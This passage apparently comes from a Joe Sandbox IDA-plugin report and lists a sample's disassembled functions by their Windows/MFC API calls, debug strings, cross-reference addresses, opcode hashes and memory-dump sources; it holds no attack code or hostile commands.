                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memcpy_s
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs > 0
                                • API String ID: 2001391462-2995908555
                                • Opcode ID: 5c56168d273a7ba7c9749d5d8ffeaeb30b790bb5328d6dcb17180d5d7e24d57e
                                • Instruction ID: efde7b7ad174af893f2c5f7497ada54c1fa11f1118d7f00715386666d6c89fed
                                • Opcode Fuzzy Hash: 5c56168d273a7ba7c9749d5d8ffeaeb30b790bb5328d6dcb17180d5d7e24d57e
                                • Instruction Fuzzy Hash: 0D11E336B416016FD724DA1DDC81EA6B3DAEFC5724B18452AF549CB341D661EC0186A1
                                APIs
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl, xrefs: 0090C145
                                • __atl_condVal, xrefs: 0090C139
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: __localtime64_s
                                • String ID: __atl_condVal$f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl
                                • API String ID: 773316593-1735323259
                                • Opcode ID: dce566ee4d6af6bdf0c1597ecb42a7f3958793fddbd5adeabe5623d381097ea0
                                • Instruction ID: 9e956c7cfbcc5efdc1d4370dc850a4178e66427d16ea7f169d9ea0c9d5a98c30
                                • Opcode Fuzzy Hash: dce566ee4d6af6bdf0c1597ecb42a7f3958793fddbd5adeabe5623d381097ea0
                                • Instruction Fuzzy Hash: DF11D3B1E14108EFDF54EF64D845BAE77B9EB84304F10862AE905A72C2E2709A40D690
                                APIs
                                • IsWindow.USER32(?), ref: 00708EA0
                                • SetWindowPos.USER32(?,00000000,?,ED5B0DC1,?,00000000,000000FF,?,0070E7B0,00000000,00000000,00000000,00000000,00000000,00000097,00000000), ref: 00708EF4
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 00708EB8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 3554874738-3811864384
                                • Opcode ID: e8c67c28bf8aaeba43dad328f8bfef59c319b0b3d0bcf3f5cc70168ac79121b1
                                • Instruction ID: 2b6e3af931c033584bec5338f7182881c05221566aa7a41d89e601e60424cc75
                                • Opcode Fuzzy Hash: e8c67c28bf8aaeba43dad328f8bfef59c319b0b3d0bcf3f5cc70168ac79121b1
                                • Instruction Fuzzy Hash: 5021C875600109EFCB44DF99D980EAA73FABF88300F208258F90997291CB34ED52DB91
                                APIs
                                • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 006ED8DB
                                Strings
                                • c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h, xrefs: 006ED8FF
                                • __atl_condVal, xrefs: 006ED8F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                • String ID: __atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h
                                • API String ID: 3936482309-3498923023
                                • Opcode ID: 53b606e9df539e87ebde957e8e3402ad92ecd39d60d87e78c09a93fb9abe9b2e
                                • Instruction ID: 07365e5573810fe713d7032a63b9eed92d6ad5975224efd7d5dfaa94655a6ee6
                                • Opcode Fuzzy Hash: 53b606e9df539e87ebde957e8e3402ad92ecd39d60d87e78c09a93fb9abe9b2e
                                • Instruction Fuzzy Hash: BD11B671A44344EFD714DB58DC02FAEB7E8EB55710F00465EF915D7381DBB569008AA1
                                APIs
                                  • Part of subcall function 006EFA80: lstrlenA.KERNEL32(00000000,006D1875,0090AE67,006EFBC0,006D1875), ref: 006EFA9F
                                  • Part of subcall function 006EFA80: _swprintf_s.LIBCMTD ref: 006EFAC6
                                • __CxxThrowException@8.LIBCMTD ref: 006EFC4E
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp, xrefs: 006EFBD8, 006EFBF3
                                • Warning: constructing COleException, scode = %s., xrefs: 006EFBC1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw_swprintf_slstrlen
                                • String ID: Warning: constructing COleException, scode = %s.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 1018317437-3054231072
                                • Opcode ID: 37778d91bd2a10e5f3c3ff5e0ec0e3392811d26197c687411004df30a3d2cab8
                                • Instruction ID: 4f68a53c4192d1a04fb616214dafcdd4ccd28263249fb5d54fa8715db26a8534
                                • Opcode Fuzzy Hash: 37778d91bd2a10e5f3c3ff5e0ec0e3392811d26197c687411004df30a3d2cab8
                                • Instruction Fuzzy Hash: AF215BB1E44348ABCB00DF95D842BEEB7B5FB88710F10412AF925AB3C1D7745900CB68
                                APIs
                                • IsWindow.USER32(?), ref: 0071CE3A
                                • BeginPaint.USER32(?,?,?,0070DB39,?), ref: 0071CE72
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$BeginPaintPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
                                • API String ID: 529918256-2272135486
                                • Opcode ID: a0403444da70441004ee3d03b87d0acc7037a7b3abf77642df585987e1bbd82b
                                • Instruction ID: b4c553fa3676b5f447d556625b321908290f7b8150c1ee114eecd2e4b9f47865
                                • Opcode Fuzzy Hash: a0403444da70441004ee3d03b87d0acc7037a7b3abf77642df585987e1bbd82b
                                • Instruction Fuzzy Hash: 552138B5A44249ABCB24DF98CC45EAEB7B9FB48710F104658F92597381D7349840CB94
                                APIs
                                • IsWindow.USER32(00000000), ref: 006FBF42
                                • GetParent.USER32(00000000), ref: 006FBF88
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp, xrefs: 006FBF51, 006FBF6B
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ParentPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 3083592475-4102074842
                                • Opcode ID: 281fee2838e9178db4a566be06037e6144bff460095c87302385561f258f6e16
                                • Instruction ID: e61d99ae655d436dbf669f99cd9a196bda696e963bde5c377df22ff580d31be5
                                • Opcode Fuzzy Hash: 281fee2838e9178db4a566be06037e6144bff460095c87302385561f258f6e16
                                • Instruction Fuzzy Hash: A7112634A0520DEFDB10EBA4DD89BBE77B6AB48301F209065EA0597290D774AA81DF51
                                APIs
                                Strings
                                • c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h, xrefs: 006ED9AD
                                • nRefs != 0, xrefs: 006ED9A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Mpunct
                                • String ID: c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 4240859931-2929274957
                                • Opcode ID: 3ce2a424b3541bd06181362d58e953520e2c7cb5ecabf1ba79a253eddc77c24a
                                • Instruction ID: 532b348e8d93fdec061a329c5a4e1e539e667d642402d0e49b7ac338ac1d9cf5
                                • Opcode Fuzzy Hash: 3ce2a424b3541bd06181362d58e953520e2c7cb5ecabf1ba79a253eddc77c24a
                                • Instruction Fuzzy Hash: 5C110632640B04EFD720CB59CC41B9AF3A8FB81730F10475AE428977C1DB74AC00CA90
                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,?,00000000,00000000), ref: 006EFCD0
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp, xrefs: 006EFC97
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatMessage
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp
                                • API String ID: 1306739567-3062874304
                                • Opcode ID: 49696977f8a06dac201b3b6fc57720cac06a3c0112727587f2d90ad4ccb72589
                                • Instruction ID: 511ee3cd23c7ada5ff32d7ccb0d49db8c0467c7052f5b6afd61b58aa16ae8cf1
                                • Opcode Fuzzy Hash: 49696977f8a06dac201b3b6fc57720cac06a3c0112727587f2d90ad4ccb72589
                                • Instruction Fuzzy Hash: 1F11A375600348BBD714DFA5CC45FDA7769AB44740F208518FE149B3C0E770E940DB90
                                APIs
                                • IsWindow.USER32(?), ref: 0071CBAF
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetWindowDC.USER32(?,ED5B0DC1), ref: 0071CBE5
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp, xrefs: 0071CBBE
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageWindow$PeekPostQuit
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
                                • API String ID: 3554874738-2272135486
                                • Opcode ID: 515d93cf2c0034e71947c9ac96acbb34e2bcda974d81679dad7b0a3f01473edb
                                • Instruction ID: f1546211b1089af21e9ffa1a90df3149027fea1aefa0e980eef52c49f931f889
                                • Opcode Fuzzy Hash: 515d93cf2c0034e71947c9ac96acbb34e2bcda974d81679dad7b0a3f01473edb
                                • Instruction Fuzzy Hash: EA115EB5A54209EBCB24DFA8CC45BAEBBB4FF48710F104629E825E73C0DB349941CB91
                                APIs
                                • IsWindow.USER32(1D1313E8), ref: 0071CF3C
                                • EndPaint.USER32(1D1313E8,0070DB64,?,0070DB78,?,?), ref: 0071CF68
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PaintPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wingdi.cpp
                                • API String ID: 108199801-2272135486
                                • Opcode ID: 254bebfa57a427f9f9b097c50fe394d583a4bc5dc4f4f990acc62d45ba1f68bd
                                • Instruction ID: 9302e3d63d0f3967959de90a658867225ffb55712bc86c98f626a11e78b5555a
                                • Opcode Fuzzy Hash: 254bebfa57a427f9f9b097c50fe394d583a4bc5dc4f4f990acc62d45ba1f68bd
                                • Instruction Fuzzy Hash: 72119AB1A44209EBCB24CF98CC49BAEB7B9FB48714F104658F925A73C1CB389C41CB54
                                APIs
                                • IsWindow.USER32(6574000C), ref: 007090C0
                                • SetFocus.USER32(6574000C), ref: 0070912C
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp, xrefs: 007090D8
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$FocusPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 2026161362-3811864384
                                • Opcode ID: 914aea6e674a2958eb534db6c76a4397df87a45c9baf9902944c5a0bb53f4015
                                • Instruction ID: 4e4173d498255672a5148a5f7e3c3824acec90c2dff8b884b2411153449b4f87
                                • Opcode Fuzzy Hash: 914aea6e674a2958eb534db6c76a4397df87a45c9baf9902944c5a0bb53f4015
                                • Instruction Fuzzy Hash: 3A11DD75B00209DFDB14EBA4C959E6EB3F6BF84304F2442A8E915972D2DB39DE41DB40
                                APIs
                                • IsWindow.USER32(?), ref: 00708840
                                • GetDlgItem.USER32(?,000000FF), ref: 00708886
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$ItemPeekPostQuitWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winocc.cpp
                                • API String ID: 1284619575-3811864384
                                • Opcode ID: d68a48e39d2e8b952330daf6651ad1cb3d83b40ba3f4fbcf92c42bfc932d6296
                                • Instruction ID: 68cff5b5769a45e7ff67a7915c47130e9e826182e08d418a3f20f717bc0b5ce5
                                • Opcode Fuzzy Hash: d68a48e39d2e8b952330daf6651ad1cb3d83b40ba3f4fbcf92c42bfc932d6296
                                • Instruction Fuzzy Hash: A8111874610208EFCB54DF94C944E5A73F9AF98350F208298E9499B2C1DB35EE81DB91
                                APIs
                                • IsWindow.USER32(?), ref: 0071E563
                                • SendMessageA.USER32(?,00001002,00000001,?), ref: 0071E5BC
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl5.cpp, xrefs: 0071E572
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$PeekPostQuitSendWindow
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl5.cpp
                                • API String ID: 2781468842-2181390885
                                • Opcode ID: 39ab83117696b7d5558c06443b7da24f7a4f586449d98f2f38de43236b1b8edc
                                • Instruction ID: 3a7f3a3b458c550685c56536a250b75930e0c72a01603ec598c9b97f7883dcb1
                                • Opcode Fuzzy Hash: 39ab83117696b7d5558c06443b7da24f7a4f586449d98f2f38de43236b1b8edc
                                • Instruction Fuzzy Hash: 42113CB1A002099FDB14DF99C885FFEB7B9BF88304F104119E905AB281DB789956DBA1
                                APIs
                                Strings
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h, xrefs: 007C252E
                                • m_hBitmap != 0, xrefs: 007C2522
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: ObjectSelect
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h$m_hBitmap != 0
                                • API String ID: 1517587568-2170818146
                                • Opcode ID: 4e87822b796e179f670ed7b38aa58c1b2d5a6fcea53d135317d6d290a7e5b05a
                                • Instruction ID: 5952309ea353b8f611e533c445f43b8527523e5a1f8001cf1e958b3dbeceeaa7
                                • Opcode Fuzzy Hash: 4e87822b796e179f670ed7b38aa58c1b2d5a6fcea53d135317d6d290a7e5b05a
                                • Instruction Fuzzy Hash: A11127B4A00208EFCB14CB94DA95F5AB7F6EB88314F30819CE8089B352D730EE52DB44
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10001495
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 100014A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventStartup
                                • String ID: xy
                                • API String ID: 1546077022-2414225561
                                • Opcode ID: 4e6187215a3fbb90a9ab0a6accfe0deaf75fb9ddd4cc4110712cb414169c983f
                                • Instruction ID: 4526971d4e9e8892f9da55477b846af9768e70854d7a25fcbe15e08a4f215a97
                                • Opcode Fuzzy Hash: 4e6187215a3fbb90a9ab0a6accfe0deaf75fb9ddd4cc4110712cb414169c983f
                                • Instruction Fuzzy Hash: 5F119A74410794DAD320DF98C905BEAB7F8EF08B41F00060DF5A697AC0DBB06544CBA2
                                APIs
                                • IsWindow.USER32(?), ref: 00709040
                                • EnableWindow.USER32(?,?), ref: 0070907B
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
